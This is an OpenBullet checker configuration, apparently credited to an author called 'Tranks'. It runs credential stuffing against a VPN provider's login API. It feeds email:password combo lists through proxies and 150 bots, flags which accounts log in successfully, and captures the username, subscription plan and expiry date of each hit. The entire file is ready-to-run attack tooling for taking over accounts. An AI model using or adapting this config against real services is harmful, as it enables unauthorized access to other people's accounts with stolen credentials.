[SETTINGS]
{
  "CreatorLK": "OB-23f244d14075df106e85c6a72d0f039d-LoliKEY",
  "Name": "HMA.Tranks",
  "SuggestedBots": 150,
  "LastModified": "2019-05-01T04:28:07.9972597+02:00",
  "AdditionalInfo": "",
  "KeysDB": "",
  "LocalKeysDB": "",
  "isWtoEdit": false,
  "Author": "Tranks",
  "Version": "1.2.2.4",
  "IgnoreResponseErrors": false,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
#Login REQUEST POST "https://securenetconnection.com/clapi/v1.5/user/login" 
  CONTENT "username=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#CHECK KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "\"Invalid username/password combination\"}}" 
  KEYCHAIN Success OR 
    KEY "plan\":\"12 Months" 
    KEY "plan\":\"6 Months\"" 
  KEYCHAIN Retry OR 
    KEY "Error has occurred" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "\"plan\":\"\"" 
    KEY "\",\"expires\":\"1970-01-01" 

#TR PARSE "<SOURCE>" LR "\"user\":\"" "\"" -> CAP "Name" 

#EN PARSE "<SOURCE>" LR "\",\"plan\":\"" "\"" -> CAP "Plan" 

#KS PARSE "<SOURCE>" LR "expires\":\"" "T" -> CAP "Ending" "" "  |By:Tranks" 

